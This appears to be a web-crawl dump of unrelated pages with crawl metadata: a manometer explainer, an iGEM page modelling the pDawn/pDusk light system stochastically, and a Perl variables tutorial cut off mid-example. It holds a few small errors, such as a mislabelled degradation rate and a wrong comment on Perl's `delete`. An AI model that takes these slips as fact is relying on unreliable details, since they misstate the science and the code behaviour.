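print(hex_to_rgb('#ce001c'))             # (206, 0, 28)
print(hex_to_hsl('#ce001c'))             # (351.8, 100.0, 40.4)
print(blend('#ce001c', '#ffffff', 0.5))  # a 50% tint of #ce001c
print(blend('#ce001c', '#000000', 0.5))  # a 50% shade of #ce001c
```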
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5333142,"math_prob":0.78741443,"size":3645,"snap":"2021-31-2021-39","text_gpt3_token_len":1601,"char_repetition_ratio":0.1395221,"word_repetition_ratio":0.011111111,"special_character_ratio":0.5462277,"punctuation_ratio":0.23094426,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9805923,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-16T20:01:40Z\",\"WARC-Record-ID\":\"<urn:uuid:ade33d02-e577-4a1b-b053-1548e9fe6431>\",\"Content-Length\":\"36083\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2669b712-a32d-46dc-adac-36b005b8fbbf>\",\"WARC-Concurrent-To\":\"<urn:uuid:28a985c3-c7c8-43fe-b1bc-23808604919e>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/ce001c\",\"WARC-Payload-Digest\":\"sha1:6LRJA2BRU6DYSAF7JBOKWEVEJLZ4N2NF\",\"WARC-Block-Digest\":\"sha1:XS5HM3JPLUTKJN75BCXMCJWSXZV2PLCQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780053717.37_warc_CC-MAIN-20210916174455-20210916204455-00318.warc.gz\"}"}
https://automationforum.co/what-is-a-manometer-and-for-what-purpose-it-is-used/
[ "Pressure Measurement\n\n# What is a manometer and for what purpose it is used?", null, "A manometer is an instrument which is widely used for many industrial applications, this device can be used to measure the pressure difference between two points in a pipe or it can also be used to determine the pressure difference between two pipes. The manometer can measure the pressure by using the relation between the pressure and head. A manometer can be used to measure high pressures and negative pressure, it is also capable to measure differential pressure.\n\nManometer types\n\nTypes of pressure measurement\n\n## What are the characteristics of a manometer?\n\n• It can measure fluid pressure and this device has a tube which would be bent and it would have more than one liquid and their density would be different\n• The measurement is done by using the known and unknown pressure of the liquid and it would be located at the different end of the tube\n• The differential pressure manometer is only used when we need to know the difference between the two pressure\n• This device can measure static pressure\n\n## What are the properties of manometric fluids?\n\n• It would have the good chemical stability\n• Viscosity and capillary constant will be less\n• The vapor pressure and volatility will be less\n• Thermal expansion would have low co-efficient\n\n### How does a manometer work, and what is the principle of manometer? How is a manometer used to measure pressure?\n\nThe manometer working is based on hydrostatic balance principle mostly a manometer would have a reservoir and it will contain liquid. The source will be connected to the reservoir so that the pressure can be measured. The reservoir will be connected to a column and the column will be exposed to the atmospheric pressure. Manometers could have sealed or unsealed columns, gauge pressure can be measured by using an open column manometer. Absolute pressure can be measured by using a sealed column manometer and these manometers can also be used to measure vacuum.\n\nIf we connect the manometer to a process there would be variations in the liquid level of the column, and these variations will be dependent on the pressure source that is to be measured. We should know the liquid type in the column, according to the type of the liquid used there could be a rise or fall according to the pressure, and we should also know the specific gravity to do the measurement properly.\n\n### What are the types of manometer?\n\nClassification of manometers\n\nThe manometers can be classified into two types they are simple manometer and differential manometer.\n\nSimple manometer\n\nThis type of manometer can measure the pressure of the fluid at a point in the pipe the types of simple manometers are piezometer, U-tube manometer, and single column manometer.\n\nDifferential manometer\n\nThis type of manometer measures the pressure difference between two points, the types of differential manometers are U-tube differential manometer, Inverted U-tube differential manometer.\n\nPiezometer\n\nA piezometer is a simple manometer, it is used to measure the pressure inside the pipe that has liquid. This device has a vertical tube and its operation is based on the principle of hydrostatic equilibrium. The one end of this device glass tube will be connected to the point in which the pressure is to be measured and the other end will be opened to the atmosphere. 
The pressure rise will be according to the pressure at that point and this pressure can be measured by the liquid height in the tube.\n\nWhat are the disadvantages of the piezometer?\n\n• It can only measure the gauge pressure and cannot be used to measure the negative pressure\n• The pressure of the gas cannot be measured by this device\n\nU- tube manometer\n\nThis device is composed of a U-shaped glass and its one end is opened to the atmosphere and the other end is connected to the point in which the pressure is to be measured. This device is capable to measure the large pressures in the lighter liquids. This device tube will be filled with mercury or can be considered as the manometric fluid and this device can be used to measure the gas and liquid.\n\nWhat are the applications of the U-tube manometer?\n\n• It can be used for low range pressure measurement\n• Widely used in laboratories\n• It can also be used to detect the pressure drop in valves\n\nInverted U-tube manometer\n\nIn this type of manometer, an inverted U-tube is used, it can be used to measure the difference of low pressure. This can do accurate measurements, the both end of the tube will be connected to the point in which the pressure difference is to be determined.\n\n#### What are the factors that affect the accuracy of the manometer?\n\n• We must consider the type of liquid in the column for accurate measurement\n• The specific gravity of the liquid in the column must be known\n• The accuracy of the manometer is also depended on the liquid shape at the interference between the liquid and air in the column\n• The column liquid quality is important\n• The characteristic of the indicating fluid is an important factor the fluid must have good wetting characteristics\n\n#### How is a simple manometer different from a differential manometer?\n\nA simple manometer can only measure the pressure at a point, while the differential manometer is used to determine the pressure between two points. In a simple manometer, one of the limbs is open to the air and the other one is connected to the point, while in a differential manometer the limbs are connected to two points. 
In the case of a simple manometer, the pressure is determined by the difference of level of fluid flowing through the pipe, while in a differential manometer the difference of pressure is determined by measuring the difference of the levels of the manometer liquid.\n\n#### What are the advantages of a manometer?\n\n• It has good accuracy and sensitivity\n• Maintenance is less\n• Vibration is not a problem for this device\n• It is easy to manufacture this device and it costs very less\n• This device can be used for low pressure and low differential pressure\n• The sensitivity of this device can be easily changed according to our need\n\n#### What are the limitations of the manometer?\n\n• It is not compact and has a big size\n• It could be easily damaged because it is fragile\n• The measurement of the manometer is affected by variations in temperature, gravity, and altitude\n• Because of the surface tension of the manometric fluid, a capillary effect is created\n• Dynamic response is not good\n\n#### What are the applications of a manometer?\n\n• It can be used for pressure monitoring applications\n• It can also be used to monitor the air and gas pressure for the compressor\n• A manometer can be used to measure the static pressure and vacuum\n• Mercury absolute manometers are used in power plants\n• This device is used for whether studies, research labs, gas analysis, etc" ]
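The pressure-head relation the article relies on is the hydrostatic balance ΔP = ρ·g·h; for a differential U-tube with process fluid standing above the manometric fluid, the effective relation is ΔP = (ρ_m - ρ_f)·g·h. The short Python sketch below is purely illustrative: the densities and the 0.25 m column height are assumed example values, not figures taken from this article.

```python
# Illustrative only: example figures, not data from the article above.
g = 9.81              # gravitational acceleration, m/s^2
rho_mercury = 13600   # manometric fluid density, kg/m^3
rho_water = 1000      # process fluid density, kg/m^3
h = 0.25              # difference in mercury levels between the limbs, m

# Simple U-tube open to atmosphere: gauge pressure at the tapping point.
p_gauge = rho_mercury * g * h
print(f"gauge pressure ≈ {p_gauge / 1000:.1f} kPa")        # ≈ 33.4 kPa

# Differential U-tube between two points in a water line: the water sitting
# above the mercury partly offsets the column, so the effective density
# difference is (rho_mercury - rho_water).
dp = (rho_mercury - rho_water) * g * h
print(f"differential pressure ≈ {dp / 1000:.1f} kPa")      # ≈ 30.9 kPa
```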
[ null, "https://cdn.automationforum.co/uploads/2020/10/Untitled-20.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9437103,"math_prob":0.9353398,"size":6691,"snap":"2022-40-2023-06","text_gpt3_token_len":1360,"char_repetition_ratio":0.23119485,"word_repetition_ratio":0.07394669,"special_character_ratio":0.19010611,"punctuation_ratio":0.05232558,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9795148,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-08T17:50:49Z\",\"WARC-Record-ID\":\"<urn:uuid:f7d471a2-794d-42da-810a-dee80e0b2548>\",\"Content-Length\":\"179987\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8beab037-60ee-4b7d-b2ab-c5aef579a556>\",\"WARC-Concurrent-To\":\"<urn:uuid:b073e1e0-69fa-41b0-b3f0-55d185a335d2>\",\"WARC-IP-Address\":\"104.21.38.128\",\"WARC-Target-URI\":\"https://automationforum.co/what-is-a-manometer-and-for-what-purpose-it-is-used/\",\"WARC-Payload-Digest\":\"sha1:MJ7EY737Q7TEZRDRRWHAWHKDKAJC7WB4\",\"WARC-Block-Digest\":\"sha1:O54NFZRU66CHO2WRIULIVI335WTOGUTG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500837.65_warc_CC-MAIN-20230208155417-20230208185417-00209.warc.gz\"}"}
http://2018.igem.org/Team:CUNY_Kingsborough/Light_Operon
[ "# Team:CUNY Kingsborough/Light Operon", null, "# Light Operon\n\n## 1. Introduction\n\nA deterministic model of differential equations over a continuous time interval is generally easy to implement using known numerical methods. However, the equations alone do not account for the variability in expression that we often observe at low molecular count. In other words, deterministic simulations fail to capture the actual physical basis of the reaction (Gillespie 1977; Wilkinson 2012). This is due to the intrinsic and extrinsic noise that occurs at low intracellular molecular counts; interactions do not follow traditionally defined constant parameters which limits the accurate characterization of a genetic system (Elowitz et al., 2002).\n\nIt then becomes essential when characterizing a genetic system to have a deterministic approach (to capture the large average overtime) in addition to a stochastic approach. A stochastic approach allows one to model the probabilistic trajectory based on the initial conditions. One commonly used stochastic algorithm is the Gillespie Algorithm— a simple but powerful approach to simulation that takes into account the initial state of the reactants, the reaction rate and the number of molecules present for a reaction with each timed step of the reaction drawn from a probability distribution (Gillespie 1977).\n\nAs a working example, we will be working with the pDawn and pDusk operon (BBa K161609 and BBa K1075044). Many teams have made either the pDawn/pDusk system as their inducer (IONIS Paris 2015, Wageningen 2016, NUS Singapore 2017, Cornell 2017, Kingsborough 2017). In 2017, NUS Singapore 2017 and Kingsborough 2017 used the pDawn/pDusk inducer to induce expression of MazF to induce cell death. To our knowledge, there is no literature or past iGEM project exploring a stochastic model of the pDawn/pDusk system at low molecule count.\n\n## 2. Methods\n\nIn order to improve reproducibility and to build on past iGEM teams’ efforts, we used the differential equations and parameters described in the 2016 Wageningen iGEM Team’s kill switch design. Using the “smfsb” package in R for stochastic simulations and the NDSolve function in Mathematica, we modeled the 3 light-sensitive states of the Yf1 homodimer over a period of 20 hours. Yll frequency simulation was done through the \"smfsb\" package in R and simulated a hundred times. Histograms were made through Excel.\n\n### Equations, Constants, & Parameters\n\n1. $$\\frac{dy_{DD}}{dt}=k_1+ 2\\cdot k_2 \\cdot y_{DL,LD} - 2 \\cdot (N\\cdot k_3) \\cdot y_{DD} - \\beta_1 \\cdot y_{DD}$$\n2. $$\\frac{dy_{DL,LD}}{dt}=2 \\cdot (N \\cdot k_3) \\cdot y_{DD} + 2 \\cdot k_2 \\cdot y_{LL} - 2 \\cdot k_2 \\cdot y_{DL,LD} - 2 \\cdot (N \\cdot k_3) \\cdot y_{DL,LD} - \\beta_2 \\cdot y_{DL,LD}$$\n3. 
$$\\frac{dy_{LL}}{dt} = 2 \\cdot (N \\cdot k_3) \\cdot y_{DL,LD} - 2\\cdot k_2 \\cdot y_{LL} - \\beta_3 \\cdot y_{LL}$$\nConstant/Parameter Value Description\n$$N$$ Variable of $$\\frac{\\mu \\cdot mol}{m^2 \\cdot h}$$ Concentration of light\n$$k_1$$ $$2.6921 \\frac{\\mu \\cdot mol}{hr}$$ Production rate of $$y_{DD}$$\n$$k_2$$ $$0.0008 \\frac{1}{hr}$$ Relaxtion rate of $$y_{DL,LD}$$ and $$y_{LL}$$\n$$k_3$$ $$0.4219 \\frac{m^2}{\\mu \\cdot mol}$$ Conversion cross-section of light intensity activated production rate of $$y_{DL,LD}$$ and $$y_{LL}$$.\n$$\\beta_1$$ $$0.3049 \\frac{1}{hr}$$ Degradation rate of $$y_{DD}$$\n$$\\beta_2$$ $$0.8406 \\frac{1}{hr}$$ Degradation rate of $$y_{DL,LD}$$\n$$\\beta_3$$ $$0.1477 \\frac{1}{hr}$$ Degradation rate of $$y_{DD}$$\n\n### Post-Reaction Pre-Reaction Matrix for Gillespie", null, "", null, "## 3. Results\n\nClick on any of the images to view full size.\n\nIn the stochastic results, we observe a much greater variation in expression at 95 $$\\mu mol$$ compared to 948 $$\\mu mol$$. Contrast this to the deterministic model in which the low/high concentration plots are identical with respect to a scaling factor. Gillespie causes step-behavior in the concentration. Although the plot of 948 $$\\mu mol$$ appears to be much smoother, we would see the same “cliffs” that we observe at 95 $$\\mu mol$$ by stretching the y-axis enough. The impact of a fixed gain or loss in concentration is much more “felt” in a small system than it would be in a large system (here size is relative to the initial concentration of Yf1). If we only cared about modeling a large, stable concentration however, the deterministic model clearly suffices to capture the general behavior and is less computationally expensive.\n\n### 1. Starting concentration of 95 Yf1 molecules (Gillespie)\n\nyDD (Dark-Dark state); yDL/LD (Dark-Light state); yLL (Light-Light state)\n\n## Figures\n\nHistograms of the frequency of Yll given a starting concentration of Ydd after a simulation of 100 times. Light is produced at a constant amount-(1ɥmol and 10 ɥmol). Frequency distribution is obtained around the time of full activation.\n\n### 2. Starting concentration of 948 Yf1 molecules (Gillespie)\n\nyDD (Dark-Dark state); yDL/LD (Dark-Light state); yLL (Light-Light state)\n\n### 3. Starting concentration of 95 and 948 Yf1 molecules (deterministic)\n\n(Left) Starting concentration of 95 Yf1 molecules; (Right) Starting concentration of 948 Yf1 molecules\nyDD (Dark-Dark state); yDL/LD (Dark-Light state); yLL (Light-Light state)\n\n### 5. Frequency of Yll at Starting Concentration of 948 Ydd\n\n(Left) Constant light at 1 mumol; (Right) Constant light at 10 mumol\n\n### 6. Frequency of Yll at Starting Concentration of 95 Ydd\n\n(Left) Constant light at 1 mumol; (Right) Constant light at 10 mumol\n\n### Citations\n\nElowitz, M. B., Levine, A. J., Siggia, E. D. & Swain, P. S. (2002), ‘Stochastic gene expression in a single cell’, Science 297(5584), 1183–1186. (Wilkinson 324-325)\n\nGillespie, D. T. (1977), ‘Exact stochastic simulation of coupled chemical reactions’, Journal of Physical Chemistry 81, 2340–2361.\n\nMöglich, Andreas, Rebecca A. Ayers, and Keith Moffat. 2009. “Design and Signaling Mechanism of Light-Regulated Histidine Kinases.\" Journal of Molecular Biology 385(5):1433–44. Retrieved (http://dx.doi.org/10.1016/j.jmb.2008.12.017).\n\nOhlendorf, Robert, Roee R. Vidavski, Avigdor Eldar, Keith Moffat, and Andreas Möglich. 2012. 
“From Dusk till Dawn: One-Plasmid Systems for Light-Regulated Gene Expression.\" Journal of Molecular Biology 416(4):534–42. Retrieved (http://dx.doi.org/10.1016/j.jmb.2012.01.001)\n\nWilkinson, D. J. (2011) Stochastic modelling for systems biology, second edition, Boca Raton, Florida: Chapman and Hall/CRC Press.\n\nhttp://2016.igem.org/Team:Wageningen_UR/Description>" ]
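The wiki names the R "smfsb" package and Mathematica's NDSolve but does not reproduce the simulation code itself. As a rough illustration of the direct-method Gillespie algorithm described in the introduction, here is a minimal Python sketch. It is not the team's code: the propensities are simply read off the terms of equations 1-3 (an assumption about how the pre-/post-reaction matrix was set up), and the rate constants are the ones tabulated above, with time in hours and light intensity N in the units given there.

```python
import random

# Rate constants from the table above (time in hours).
k1, k2, k3 = 2.6921, 0.0008, 0.4219
b1, b2, b3 = 0.3049, 0.8406, 0.1477

def gillespie(y_dd, y_dl, y_ll, N, t_end=20.0, seed=None):
    """One stochastic trajectory of the three Yf1 states up to t_end hours."""
    rng = random.Random(seed)
    state = [y_dd, y_dl, y_ll]
    # (propensity, state change) pairs mirroring the terms of equations 1-3.
    reactions = [
        (lambda s: k1,                ( 1,  0,  0)),  # production of y_DD
        (lambda s: 2 * k2 * s[1],     ( 1, -1,  0)),  # y_DL,LD relaxes to y_DD
        (lambda s: 2 * N * k3 * s[0], (-1,  1,  0)),  # y_DD activated to y_DL,LD
        (lambda s: 2 * k2 * s[2],     ( 0,  1, -1)),  # y_LL relaxes to y_DL,LD
        (lambda s: 2 * N * k3 * s[1], ( 0, -1,  1)),  # y_DL,LD activated to y_LL
        (lambda s: b1 * s[0],         (-1,  0,  0)),  # degradation of y_DD
        (lambda s: b2 * s[1],         ( 0, -1,  0)),  # degradation of y_DL,LD
        (lambda s: b3 * s[2],         ( 0,  0, -1)),  # degradation of y_LL
    ]
    t, trajectory = 0.0, [(0.0, y_dd, y_dl, y_ll)]
    while t < t_end:
        propensities = [f(state) for f, _ in reactions]
        total = sum(propensities)
        if total == 0:
            break
        t += rng.expovariate(total)            # waiting time to the next event
        pick, acc = rng.random() * total, 0.0
        for (f, change), a in zip(reactions, propensities):
            acc += a
            if pick <= acc:
                state = [s + d for s, d in zip(state, change)]
                break
        trajectory.append((t, *state))
    return trajectory

# e.g. 95 dark-adapted Yf1 dimers under constant light N = 1
print(gillespie(95, 0, 0, N=1.0, seed=42)[-1])
```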
[ null, "http://2018.igem.org/wiki/images/0/0e/T--CUNY_Kingsborough--2018Logo.jpeg", null, "http://2018.igem.org/wiki/images/c/c0/T--CUNY_Kingsborough--reactionmatrixdiagram2.png", null, "http://2018.igem.org/wiki/images/4/4b/T--CUNY_Kingsborough--reactionmatrix.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7974825,"math_prob":0.98888665,"size":6252,"snap":"2020-10-2020-16","text_gpt3_token_len":1770,"char_repetition_ratio":0.12211908,"word_repetition_ratio":0.049668875,"special_character_ratio":0.28918746,"punctuation_ratio":0.12928082,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99589545,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,9,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-25T09:03:42Z\",\"WARC-Record-ID\":\"<urn:uuid:25415cb2-bce1-4057-a523-2124632fbc02>\",\"Content-Length\":\"33642\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d7166f85-5dc8-4197-a00e-c307332d3069>\",\"WARC-Concurrent-To\":\"<urn:uuid:53d698c6-dbb9-4dfe-b291-2a75c15a77fe>\",\"WARC-IP-Address\":\"148.62.49.124\",\"WARC-Target-URI\":\"http://2018.igem.org/Team:CUNY_Kingsborough/Light_Operon\",\"WARC-Payload-Digest\":\"sha1:AEISWJOWESWXED2ICGOLSGF4VY7FCURM\",\"WARC-Block-Digest\":\"sha1:L3CT7T5SR6QQ6OAZTF35MVEL5WYDWDBL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146064.76_warc_CC-MAIN-20200225080028-20200225110028-00437.warc.gz\"}"}
https://sodocumentation.net/perl/topic/1566/variables
[ "# Perl LanguageVariables\n\n## Syntax\n\n• my # Lexical declaration\n• our # Global declaration\n• \\$foo # Scalar\n• @foo # Array\n• \\$#foo # Array Last-Index\n• %foo # Hash\n• \\${\\$foo} # Scalar De-Reference\n• @{\\$foo} # Array De-Reference\n• \\$#{\\$foo} # Array-DeRef Last-Index\n• %{\\$foo} # Hash De-Reference\n• \\$foo[\\$index] # Array get indexed\n• \\${\\$foo}[\\$index] # Array De-Reference and get indexed.\n• \\$foo->[\\$index] # Array De-Reference and get indexed ( Simplified )\n• \\$foo{\\$key} # Hash get value for key\n• \\${\\$foo}{\\$key} # Hash Dereference and get value for key\n• \\$foo->{\\$key} # Hash Dereference and get value for key ( Simplified )\n• \\\\$x # Reference to Scalar\n• \\@x # Reference to Array\n• \\%x # Reference to Hash\n• =[ ] # Reference to Anonymous Array (Inline)\n• ={ } # Reference to Anonymous Hash (Inline)\n\n## Scalars\n\nScalars are Perl's most basic data type. They're marked with the sigil `\\$` and hold a single value of one of three types:\n\n• a number (`3`, `42`, `3.141`, etc.)\n• a string (`'hi'`, `\"abc\"`, etc.)\n• a reference to a variable (see other examples).\n``````my \\$integer = 3; # number\nmy \\$string = \"Hello World\"; # string\nmy \\$reference = \\\\$string; # reference to \\$string\n``````\n\nPerl converts between numbers and strings on the fly, based on what a particular operator expects.\n\n``````my \\$number = '41'; # string '41'\nmy \\$meaning = \\$number + 1; # number 42\nmy \\$sadness = '20 apples'; # string '20 apples'\nmy \\$danger = \\$sadness * 2; # number '40', raises warning\n``````\n\nWhen converting a string into a number, Perl takes as many digits from the front of a string as it can – hence why `20 apples` is converted into `20` in the last line.\n\nBased on whether you want to treat the contents of a scalar as a string or a number, you need to use different operators. Do not mix them.\n\n``````# String comparison # Number comparison\n'Potato' eq 'Potato'; 42 == 42;\n'Potato' ne 'Pomato'; 42 != 24;\n'Camel' lt 'Potato'; 41 < 42;\n'Zombie' gt 'Potato'; 43 > 42;\n\n# String concatenation # Number summation\n'Banana' . 'phone'; 23 + 19;\n\n# String repetition # Number multiplication\n'nan' x 3; 6 * 7;\n``````\n\nAttempting to use string operations on numbers will not raise warnings; attempting to use number operations on non-numeric strings will. Do be aware that some non-digit strings such as `'inf'`, `'nan'`, `'0 but true'` count as numbers.\n\n## Arrays\n\nArrays store an ordered sequence of values. You can access the contents by index, or iterate over them. 
The values will stay in the order you filled them in.\n\n``````my @numbers_to_ten = (1,2,3,4,5,6,7,8,9,10); # More conveniently: (1..10)\nmy @chars_of_hello = ('h','e','l','l','o');\nmy @word_list = ('Hello','World');\n\n# Note the sigil: access an @array item with \$array[index]\nmy \$second_char_of_hello = \$chars_of_hello[1]; # 'e'\n\n# Use negative indices to count from the end (with -1 being last)\nmy \$last_char_of_hello = \$chars_of_hello[-1];\n\n# Assign an array to a scalar to get the length of the array\nmy \$length_of_array = @chars_of_hello; # 5\n\n# You can use \$# to get the last index of an array, and confuse Stack Overflow\nmy \$last_index_of_array = \$#chars_of_hello; # 4\n\n# You can also access multiple elements of an array at the same time\n# This is called \"array slice\"\n# Since this returns multiple values, the sigil to use here on the RHS is @\nmy @some_chars_of_hello = @chars_of_hello[1..3]; # ('e', 'l', 'l')\nmy @out_of_order_chars = @chars_of_hello[1,4,2]; # ('e', 'o', 'l')\n\n# In Python you can say array[1:-1] to get all elements but first and last\n# Not so in Perl: (1..-1) is an empty list. Use \$# instead\nmy @empty_list = @chars_of_hello[1..-1]; # ()\nmy @inner_chars_of_hello = @chars_of_hello[1..\$#chars_of_hello-1]; # ('e','l','l')\n\n# Access beyond the end of the array yields undef, not an error\nmy \$undef = \$chars_of_hello[5]; # undef\n``````\n\nArrays are mutable:\n\n``````use utf8; # necessary because this snippet is utf-8\n\$chars_of_hello[1] = 'u'; # ('h','u','l','l','o')\npush @chars_of_hello, ('!', '!'); # ('h','u','l','l','o','!','!')\npop @chars_of_hello; # ('h','u','l','l','o','!')\nshift @chars_of_hello; # ('u','l','l','o','!')\nunshift @chars_of_hello, ('¡', 'H'); # ('¡','H','u','l','l','o','!')\n@chars_of_hello[2..5] = ('O','L','A'); # ('¡','H','O','L','A',undef,'!') whoops!\ndelete \$chars_of_hello[-2]; # ('¡','H','O','L','A', '!')\n\n# Setting elements beyond the end of an array does not result in an error\n# The array is extended with undef's as necessary. This is \"autovivification.\"\nmy @array; # ()\n\$array[3] = 'x'; # (undef, undef, undef, 'x')\n``````\n\nFinally, you can loop over the contents of an array:\n\n``````use v5.10; # necessary for 'say'\nfor my \$number (@numbers_to_ten) {\nsay \$number ** 2;\n}\n``````\n\nWhen used as booleans, arrays are true if they are not empty.\n\n## Hashes\n\nHashes can be understood as lookup tables. You can access their contents by specifying a key for each of them. Keys must be strings. If they're not, they will be converted to strings.\n\nIf you simply give the hash a known key, it will serve you its value.\n\n``````# Elements are in (key, value, key, value) sequence\nmy %inhabitants_of = (\"London\", 8674000, \"Paris\", 2244000);\n\n# You can save some typing and gain in clarity by using the \"fat comma\"\n# syntactical sugar. It behaves like a comma and quotes what's on the left.\nmy %translations_of_hello = (spanish => 'Hola', german => 'Hallo', swedish => 'Hej');\n``````\n\nIn the following example, note the brackets and sigil: you access an element of `%hash` using `\$hash{key}` because the value you want is a scalar. Some consider it good practice to quote the key while others find this style visually noisy. 
Quoting is only required for keys that could be mistaken for expressions, like `\$hash{'some-key'}`.\n\n``````my \$greeting = \$translations_of_hello{'spanish'};\n``````\n\nWhile Perl by default will try to use barewords as strings, the `+` modifier can also be used to tell Perl that the key should not be auto-quoted but executed, with the result of that execution being used as the key:\n\n``````my %employee = ( name => 'John Doe', shift => 'night' );\n# this example will print 'night'\nprint \$employee{shift};\n\n# but this one will execute [shift], extracting first element from @_,\n# and use result as a key\nprint \$employee{+shift};\n``````\n\nAs with arrays, you can access multiple hash elements at the same time. This is called a hash slice. The resulting value is a list, so use the `@` sigil:\n\n``````my @words = @translations_of_hello{'spanish', 'german'}; # ('Hola', 'Hallo')\n``````\n\nIterate over the keys of a hash with `keys`. `keys` will return items in a random order. Combine with `sort` if you wish.\n\n``````for my \$lang (sort keys %translations_of_hello) {\nsay \$translations_of_hello{\$lang};\n}\n``````\n\nIf you do not actually need the keys, as in the previous example, `values` returns the hash's values directly:\n\n``````for my \$translation (values %translations_of_hello) {\nsay \$translation;\n}\n``````\n\nYou can also use a while loop with `each` to iterate over the hash. This way, you will get both the key and the value at the same time, without a separate value lookup. Its use is however discouraged, as `each` can break in mystifying ways.\n\n``````# DISCOURAGED\nwhile (my (\$lang, \$translation) = each %translations_of_hello) {\nsay \$translation;\n}\n``````\n\nAccess to unset elements returns undef, not an error:\n\n``````my \$italian = \$translations_of_hello{'italian'}; # undef\n``````\n\n`map` and list flattening can be used to create hashes out of arrays. This is a popular way to create a 'set' of values, e.g. to quickly check whether a value is in `@elems`. This operation usually takes O(n) time (i.e. proportional to the number of elements) but can be done in constant time (O(1)) by turning the list into a hash:\n\n``````@elems = qw(x y x z t);\nmy %set = map { \$_ => 1 } @elems; # (x, 1, y, 1, z, 1, t, 1)\nmy \$y_membership = \$set{'y'}; # 1\nmy \$w_membership = \$set{'w'}; # undef\n``````\n\nThis requires some explanation. The contents of `@elems` get read into a list, which is processed by `map`. `map` accepts a code block that gets called for each value of its input list; the value of the element is available for use in `\$_`. Our code block returns two list elements for each input element: `\$_`, the input element, and `1`, just some value. Once you account for list flattening, the outcome is that `map { \$_ => 1 } @elems` turns `qw(x y x z t)` into `(x => 1, y => 1, x => 1, z => 1, t => 1)`.\n\nAs those elements get assigned into the hash, odd elements become hash keys and even elements become hash values. When a key is specified multiple times in a list to be assigned to a hash, the last value wins. This effectively discards duplicates.\n\nA faster way to turn a list into a hash uses assignment to a hash slice. 
It uses the `x` operator to multiply the single-element list `(1)` by the size of `@elems`, so there is a `1` value for each of the keys in the slice on the left-hand side:\n\n``````@elems = qw(x y x z t);\nmy %set;\n@set{@elems} = (1) x @elems;\n``````\n\nThe following application of hashes also exploits the fact that hashes and lists can often be used interchangeably to implement named function args:\n\n``````sub hash_args {\nmy %args = @_;\nmy %defaults = (foo => 1, bar => 0);\nmy %overrides = (__unsafe => 0);\nmy %settings = (%defaults, %args, %overrides);\n}\n\n# This function can then be called like this:\nhash_args(foo => 5, bar => 3); # (foo => 5, bar => 3, __unsafe => 0)\nhash_args(); # (foo => 1, bar => 0, __unsafe => 0)\nhash_args(__unsafe => 1); # (foo => 1, bar => 0, __unsafe => 0)\n``````\n\nWhen used as booleans, hashes are true if they are not empty.\n\n## Scalar References\n\nA reference is a scalar variable (one prefixed by `\$`) which “refers to” some other data.\n\n``````my \$value = \"Hello\";\nmy \$reference = \\\$value;\nprint \$value; # => Hello\nprint \$reference; # => SCALAR(0x2683310)\n``````\n\nTo get the referred-to data, you de-reference it.\n\n``````say \${\$reference}; # Explicit prefix syntax\nsay \$\$reference; # The braces can be left out (confusing)\n``````\n5.24.0\n\nNew postfix dereference syntax, available by default from v5.24\n\n``````use v5.24;\nsay \$reference->\$*; # New postfix notation\n``````\n\nThis \"de-referenced value\" can then be changed as if it were the original variable.\n\n``````\${\$reference} =~ s/Hello/World/;\nprint \${\$reference}; # => World\nprint \$value; # => World\n``````\n\nA reference is always truthy – even if the value it refers to is falsy (like `0` or `\"\"`).\n\n## You may want a Scalar Reference If:\n\n• You want to pass a string to a function, and have it modify that string for you without it being a return value.\n\n• You wish to explicitly avoid Perl implicitly copying the contents of a large string at some point in your function passing (especially relevant on older Perls without copy-on-write strings).\n\n• You wish to disambiguate string-like values with specific meaning from strings that convey content, for example:\n\n• Disambiguate a file name from file content\n• Disambiguate returned content from a returned error string\n• You wish to implement a lightweight inside-out object model, where objects handed to calling code don't carry user-visible metadata:\n\n``````our %objects;\nmy \$next_id = 0;\nsub new {\nmy \$object_id = \$next_id++;\n\$objects{ \$object_id } = { ... 
}; # Assign data for object\nmy \$ref = \\\$object_id;\nreturn bless( \$ref, \"MyClass\" );\n}\n``````\n\n## Array References\n\nArray References are scalars (`\$`) which refer to Arrays.\n\n``````my @array = (\"Hello\"); # Creating array, assigning value from a list\nmy \$array_reference = \\@array;\n``````\n\nThey can also be created in a more shorthand way as follows:\n\n``````my \$other_array_reference = [\"Hello\"];\n``````\n\nModifying / using array references requires dereferencing them first.\n\n``````my @contents = @{ \$array_reference }; # Prefix notation\nmy @contents = @\$array_reference; # Braces can be left out\n``````\n5.24.0\n\nNew postfix dereference syntax, available by default from v5.24\n\n``````use v5.24;\nmy @contents = \$array_reference->@*; # New postfix notation\n``````\n\nWhen accessing an arrayref's contents by index you can use the `->` syntactical sugar.\n\n``````my @array = qw(one two three); my \$arrayref = [ qw(one two three) ];\nmy \$one = \$array[0]; my \$one = \$arrayref->[0];\n``````\n\nUnlike arrays, arrayrefs can be nested:\n\n``````my @array = ( (1, 0), (0, 1) ); # ONE array of FOUR elements: (1, 0, 0, 1)\nmy @matrix = ( [1, 0], [0, 1] ); # an array of two arrayrefs\nmy \$matrix = [ [0, 